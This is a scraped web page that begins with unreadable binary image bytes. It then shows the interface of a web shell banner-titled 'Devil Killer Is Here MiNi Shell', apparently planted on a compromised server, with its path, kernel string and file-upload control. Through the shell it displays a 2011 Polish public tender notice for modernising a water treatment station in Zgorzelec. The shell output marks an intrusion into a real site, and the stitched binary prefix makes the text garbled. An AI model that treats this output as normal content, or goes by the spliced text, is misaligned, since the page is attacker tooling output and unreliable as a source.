JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111110/373656-N-2011.html

<p class="kh_header"><b>Zgorzelec: Modernizacja Stacji Uzdatniania Wody przy ul. Henrykowskiej w Zgorzelcu</b><br>
<b>Numer ogłoszenia: 373656 - 2011; data zamieszczenia: 10.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Stacji Uzdatniania Wody przy ul. Henrykowskiej w Zgorzelcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, polegające na budowie stacji            
    uzdatniania wody wraz z modernizacją ujęcia wody przy ul. Henrykowskiej w 
    Zgorzelcu.             
    
2. W ramach robót budowlanych należy wykonać:  
    1)  demontaż istniejących obudów studni oraz wykonanie nowych kompaktowych
         obudów wraz z uzbrojeniem istniejących studni ujściowych, 
     2) budowa budynku technologicznego SUW o powierzchni użytkowej 209,80 m2 
         i kubaturze 1260,20 m3  wraz z pełną instalacją wewnętrzną, 
     3) wyposażenie stacji w urządzenia technologiczne oraz rurociągi, w tym:
         a) desorber o średnicy wewnętrznej O 1800 mm, 
         b) wentylator do napowietrzania wody, 
         c) zestaw pomp przewałowych, 
         d) 4 filtry automatyczne o średnicy O 2800, 
         e) dmuchawę oraz pompę do płukania filtrów, 
         f) zestaw pomp sieciowych, 
         g) zestaw do dezynfekcji podchlorynem sodu
     4) budowa zbiornika wody czystej o pojemności V=2x250m3 , 
     5) wykonanie niezbędnych rurociągów technologicznych, międzyobiektowych o 
         średnicach od O 315 do 110 mm, o długości całkowitej 1=249,0m, 
     6) wykonanie kanałów o średnicach O 110, O 160, O 315 mm z PCV o łącznej długości
         1=69,3 m, 
     7) wykonanie bezodpływowego neutralizatora ścieków z dozowni o pojemności 3 m3 , 
     8) wykonanie kabli zasilających i sterowniczych, 
     9) wykonanie drogi oraz placu na terenie stacji oraz zjazdu z drogi wojewódzkiej nr
         351 na teren SUW, 
   10) zagospodarowanie terenu działki zielenią, 
   11) wykonanie ogrodzenia z siatki z drutu ocynkowanego w ramkach stalowych o 
         długości całkowitej 1=279,2m, w tym brama wjazdowa automatyczna przesuwna 
         o szerokości 4,0 m oraz furtka o szerokości 1,0 m, 
   12) demontaż istniejącego ogrodzenia wraz z bramami wjazdowymi o długości około 
         1=280,5 m, 
   13) wykonanie murka oporowego monolitycznego żelbetowego typu L o długości 
         1= 24,0 m, 
   14) wyburzenie istniejącego budynku chlorowni.





3. Do wymiarowania urządzeń stacji przy ul. Henrykowskiej w Zgorzelcu przyjęto
    następujące wydajności:
    1) dla układu technologicznego         QSUW = 167,0 m3 /h
    2) dla pompowni sieciowej                Qp = 240,0 m3 /h

4. Inwestycja ma na celu zaopatrzenie w wodę mieszkańców miasta Zgorzelec.
    Woda podawana ze stacji uzdatniania wody  musi być jakości, odpowiadającej 
    Rozporządzeniu Ministra Zdrowia z dnia 29.03.2007r. w sprawie jakości wody 
    przeznaczonej do spożycia przez ludzi (Dz.U. Nr 61, poz. 417 z  późn.zm.)
                                   
 5. Roboty budowlane prowadzone będą na terenie działek o nr ewidencyjnych 2, 5 Obręb 
     1 AM - 7 nr 1, 2 Obręb 1 AM - 5.

 6. Szczegółowy opis  robót budowlanych dla zadania objętego  modernizacją  Stacji 
     Uzdatniania  Wody został zawarty   w dokumentacji projektowej - Załącznik nr 8 do 
     SIWZ, w skład której wchodzi: 
     1)   Projekt Budowlany, 
     2)   Projekt Wykonawczy składający się z części:
           a) architektoniczno-budowlanej z zagospodarowaniem terenu, 
           b) drogowej, 
           c) instalacyjnej, 
           d) elektrycznej AKPiA, 
           e) technologicznej, 
           f) konstrukcyjnej - zbiornik wody czystej, 
      3)  Przedmiar Robót na część:
            a) technologiczną + sieci zewnętrzne, 
            b) drogową, 
            c) architektoniczno-budowlaną z zagospodarowaniem terenu, 
            d) instalacyjną, 
            e) elektryczną AKPiA
            f) konstrukcyjną - zbiornik wody czystej, 
      4)   ZI -393  - poprawiony opis i rysunki do części elektrycznej, 
      5)   Operat wodno-prawny na montaż urządzeń do poboru wody, 
      6)   Specyfikacja Techniczna Wykonania i Odbioru Robót, 
      7)   Karta Informacyjna przedsięwzięcia, 
      8)   Opinia Geotechniczna na temat warunków gruntowo-wodnych.                 
      Dokumenty te stanowią integralną część decyzji pozwolenia na budowę  wydanej
      przez  Starostę Zgorzeleckiego z dnia 08.01.2010r. nr IIBS.7351.Zg-507/09/D-7/112/10
      oraz  Decyzji - zmiana inwestora nr BS.6740.Zg507.2009.D7.2011.zi-7.2458.2011 z 
      dnia 02.05.2011r. 
7.   Wykonawca przed przystąpieniem do realizacji robót budowlanych, przedstawi 
      Zamawiającemu wykonany i zatwierdzony projekt tymczasowej organizacji ruchu 
      (oznakowanie i zabezpieczenie robót) na  czas budowy.   

8.   Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej 
      terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji 
      przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 



9.   Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie
      z dokumentacją projektową, technologią wskazaną przez Projektanta, zgodnie z 
      zasadami wiedzy technicznej, obowiązującymi przepisami i Polskimi Normami. 
         
10. Wykonawca przed wbudowaniem materiałów budowlanych wykorzystanych w trakcie 
      realizacji robót musi uzyskać zatwierdzenie atestów i przedstawionych receptur 
      użytych w ramach inwestycji, zatwierdzenie harmonogramu dostaw urządzeń i 
      materiałów na plac budowy ze szczególnym uwzględnieniem ich kompletności, 
      sposobu i czasu magazynowania oraz zgodności z projektami i warunkami umowy 
      przez  Koordynatora Zespołu Nadzoru Inwestorskiego. 

11. Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
      odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas realizacji 
      zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst jednolity z 
      2010r. Dz. U. Nr 185, poz. 1243 z późn. zm.)  i ustawą Prawo ochrony środowiska  z 
      dnia  27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 25, poz.150 z późn.zm.). 
 
12. Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów
      wraz z kompletną dokumentacją powykonawczą zgodnie z powszechnie 
      obowiązującymi przepisami.   

13. Zamawiający wymaga, by Wykonawca powiadomił wszystkie instytucje obsługujące 
      urządzenia,  instalacje podziemne i naziemne o prowadzonych robotach budowlanych,
      w celu uzyskania przez te instytucje wszelkich niezbędnych adaptacji i możliwości  
      przeprowadzenia innych koniecznych robót  w obrębie Placu Budowy, w możliwie 
      najkrótszym czasie, nie dłuższym jednak niż  w czasie  przewidzianym na realizację 
      robót. Wykonawca ułatwi przeprowadzenie wymienionych wyżej robót i będzie ściśle 
      współpracował z tymi instytucjami. 

14. Zamawiający wymaga 36 miesięcznego okresu gwarancji i rękojmi na wykonane roboty 
      budowlane  i zastosowane przy realizacji zamówienia materiały budowlane. 
      W dniu podpisania bezusterkowego protokołu odbioru robót, Wykonawca          
      potwierdzi  Zamawiającemu udzielenie gwarancji jakości  na wykonany  przedmiot 
      umowy  i zastosowane do realizacji zamówienia  materiały wraz z podaniem terminu 
      upływu gwarancji. 
      Jeżeli producent udzieli dłuższej gwarancji na materiały zastosowane do wykonania 
      przedmiotu zamówienia, obowiązywać będzie  gwarancja producenta.

15. W ramach udzielonej gwarancji Wykonawca zobowiązany będzie do przeprowadzania  
      w  każdym roku kalendarzowym, przeglądów  gwarancyjnych a także  przeglądu 
      pogwarancyjnego.     

16. Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji 
      powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu 
      wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
            
17. Wykonawca wykona przedmiot zamówienia z materiałów własnych, które powinny 
      odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania 
      w  budownictwie zgodnie z  art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst 
      jednolity z 2010r. Dz. U. Nr 243, poz. 1623 z późn.zm.). 

18. Oferty równoważne 

      W przypadku wystąpienia w dokumentacji projektowej, opisu przedmiotu zamówienia 
      przez wskazanie znaku towarowego, patentu lub pochodzenia,  Zamawiający dopuszcza 
      składanie ofert równoważnych z zastosowaniem innych materiałów i urządzeń niż podane 
      w dokumentacji projektowej, pod  warunkiem, że zaproponowane urządzenia i materiały 
      będą posiadały parametry techniczne nie gorsze niż te, które przedstawiono w 
      dokumentacji projektowej.
      Zgodnie z art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania 
      równoważne, jest obowiązany wykazać, że oferowane przez niego materiały i urządzenia
      spełniają wymagania określone przez Zamawiającego.               
      W takim przypadku Wykonawca musi załączyć do oferty foldery, dane techniczne i 
      aprobaty techniczne tych materiałów i urządzeń, aby Zamawiający mógł sprawdzić czy 
      odpowiadają one wymaganiom postawionym w dokumentacji projektowej.  
      Zaoferowane urządzenia i materiały równoważne muszą odpowiadać co do jakości 
      wymogom  wyrobów opisanych w punkcie 17.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie
więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.24.30-5, 45.10.00.00-8, 45.30.00.00-0, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 84 500,00 zł. PLN 
    (słownie: osiemdziesiąt cztery tysiące pięćset zł.)

2. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. 
    Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
    ofert.  

3. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres 
     związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Pzp, albo nie zgodzi się 
     na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania o udzielenie 
     zamówienia, a oferta Wykonawcy wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 
     4 ustawy Pzp.

4. W zależności od woli wykonawcy wadium może być wnoszone w następujących  formach:
1)	pieniądzu,
        2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        3)   gwarancjach bankowych,
        4)   gwarancjach ubezpieczeniowych,
        5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
              ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
              Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1, lub pełnomocnictw.  

5. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie 
    wadium do Zamawiającego.

6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I O/Zgorzelec.
    Na przelewie należy  umieścić informację :
Wadium na Modernizacja Stacji Uzdatniania Wody przy ul. Henrykowskiej w Zgorzelcu


7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze    
    najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego 
    oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 13. 
    
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci 
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu 
    zabezpieczenia należytego wykonania umowy.  


9.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed  
     upływem terminu składania ofert. 

10. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu  zwrócono 
      wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia 
      odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium 
      w terminie określonym przez Zamawiającego. 

11. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami       
      wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
      pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew 
      pieniędzy na rachunek bankowy wskazany przez wykonawcę.

12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
      a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie, 
      b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
      c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie wykonawcy.

13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
      odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
      dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
      że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał: 
- dwie  roboty budowlane polegające na budowie, lub przebudowie stacji
   uzdatniania wody z pełną instalacją technologiczną wraz z sieciami 
   zewnętrznymi o łącznej wartości min. 5 000 000,00 zł. 
                
 Ocena spełnienia powyższego warunku dokonana zostanie w oparciu o analizę                                                           
przedłożonych przez Wykonawcę dokumentów i oświadczeń,  z treści których wynikać 
będą informacje potwierdzające spełnienie w/w warunku.     
Nie wykazanie w wystarczający sposób potwierdzenia spełnia powyższego warunku  
spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności 
określonych w art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż: 
a)  dysponuje minimum 1 osobą, która będzie wykonywać zamówienie, posiadającą
     uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń,  wraz 
     z informacją Wykonawcy o podstawie do dysponowania tą osobą, 
   
b)  dysponuje minimum 1 osobą, która będzie wykonywać zamówienie, posiadającą
uprawnienia budowlane w specjalności  instalacyjnej w zakresie sieci, instalacji 
i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez 
ograniczeń,  wraz z informacją Wykonawcy o podstawie do dysponowania tą osobą,      

c)  dysponuje minimum 1 osobą, która będzie wykonywać zamówienie, posiadającą
     uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń 
     elektrycznych i elektroenergetycznych bez ograniczeń, wraz z informacja Wykonawcy
     o podstawie do dysponowania tą osobą. 
     Ocena spełnienia powyższego warunku dokonana zostanie w oparciu o analizę                                                   
     przedłożonych przez Wykonawcę dokumentów i oświadczeń,  z treści których wynikać 
     będą informacje potwierdzające spełnienie w/w warunku.     
     Nie wykazanie w wystarczający sposób potwierdzenia spełnia powyższego warunku  
     spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności 
     określonych w art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia oferty zgodnie z art. 89 ust. 1  pkt. 2, z zastrzeżeniem art. 87 ust. 2 pkt.3 ustawy Prawo zamówień publicznych. 

1)  wypełniony i podpisany formularz Oferta  - Załącznik nr 1 do SIWZ,        
2)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ.
     Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
     powierzyć do wykonania  części zamówienia.  
     W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie 
     wypełnienia Zamawiający uzna, iż Wykonawca wykona zamówienie własnymi  
     siłami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
 warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 
1. Zakres przewidzianych zmian:

    1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w 
        przypadku wystąpienia opóźnień wynikających z:  
        a) opóźnień zawinionych przez Zamawiającego, mających wpływ na termin realizacji 
            przedmiotu umowy, w szczególności dot. przekazania terenu budowy, 
           przekazania  dokumentacji projektowej, dokonania odbioru końcowego robót, 
       b) opóźnień z powodu wystąpienia warunków   atmosferycznych uniemożliwiających 
           wykonanie robót budowlanych zgodnie z technologią  - a fakt wystąpienia  tych
           warunków wpisany zostanie przez Kierownika Robót do Dziennika Budowy
           i zostanie  potwierdzony przez Inspektora Nadzoru działającego z ramienia 
           Zamawiającego, 
